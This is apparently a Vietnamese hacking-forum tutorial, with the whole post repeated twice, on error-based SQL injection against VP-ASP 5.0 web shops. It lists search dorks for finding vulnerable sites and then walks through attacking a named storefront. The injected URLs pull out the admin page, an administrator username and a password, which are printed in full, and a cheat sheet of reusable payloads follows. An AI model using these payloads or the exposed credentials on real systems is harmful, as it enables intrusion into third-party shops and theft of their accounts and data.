Trang Chính
![--[DEVELOPER]--](https://2img.net/i/itest/ranks/stars/stars14.gif "--[DEVELOPER]--")
- Từ Khóa :
+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- Tôi chỉ đưa ra 2 từ khóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có thể tìm ra được VP-ASP.
Chúng ta bắt đâu hack 1 site demo:
Mục tiêu là hxxps://circleathletics.com/ (sử dụng VP-ASP V5.0)
- đầu tiên chúng ta tìm link admin của site này
- hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp … thử với câu lênh sau thay chữ a = s
- hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='s')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int.
/shop/shop$db.asp, line 409
- Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ khác và tiếp theo
- hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,2) ='sh')
- Chú ý chỗ này nha (fieldvalue,2)='sh')
- Cú tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp nên không cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu
Tiếp theo chúng ta tìm user + pass admin hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Ko có gì hết tiếp tục như thế
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='c')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'circ54' to a column of data type int.
/shop/shop$db.asp, line 409
Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như khi tìm link admin là ok hihi
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser %20where%20admintype='super'%20and%20left(fldusern ame,2)='ab')
đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà.
Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 13
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='2')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '2005HCP' to a column of data type int.
/shop/shop$db.asp, line 409
Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn
Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm
Còn đây là 1 số tham khỏa them
*************(*** Ti`m link admin ***************************************
%20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a') <=== Doan ki tu dau
%20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a'%20and%20len(fieldvalue)= 15) <=== Tim so ki tu .
**************** Ti`m user ***********************************************
or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== Ki tu dau
or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep
or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== So ki tu cua user
or 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin
*************** Ti`m pass ************************************************
or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== Ki tu dau
or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== So ki tu
-------------------
+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- Tôi chỉ đưa ra 2 từ khóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có thể tìm ra được VP-ASP.
Chúng ta bắt đâu hack 1 site demo:
Mục tiêu là hxxps://circleathletics.com/ (sử dụng VP-ASP V5.0)
- đầu tiên chúng ta tìm link admin của site này
- hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp … thử với câu lênh sau thay chữ a = s
- hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,1) ='s')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int.
/shop/shop$db.asp, line 409
- Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ khác và tiếp theo
- hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fie ldname,10)='xadminpage'%20and%20left(fieldvalue,2) ='sh')
- Chú ý chỗ này nha (fieldvalue,2)='sh')
- Cú tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp nên không cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu
Tiếp theo chúng ta tìm user + pass admin hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Ko có gì hết tiếp tục như thế
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='s uper'%20and%20left(fldusername,1)='c')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'circ54' to a column of data type int.
/shop/shop$db.asp, line 409
Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như khi tìm link admin là ok hihi
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser %20where%20admintype='super'%20and%20left(fldusern ame,2)='ab')
đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà.
Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 13
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername= 'circ54'%20and%20left(fldpassword,1)='2')
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '2005HCP' to a column of data type int.
/shop/shop$db.asp, line 409
Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn
Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm
Còn đây là 1 số tham khỏa them
*************(*** Ti`m link admin ***************************************
%20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a') <=== Doan ki tu dau
%20or%201=(select%20fieldname%20from%20configurati on%20where%20left(fieldname,10)='xadminpage'%20and %20left(fieldvalue,1)='a'%20and%20len(fieldvalue)= 15) <=== Tim so ki tu .
**************** Ti`m user ***********************************************
or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== Ki tu dau
or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep
or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== So ki tu cua user
or 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin
*************** Ti`m pass ************************************************
or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== Ki tu dau
or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== So ki tu
-------------------
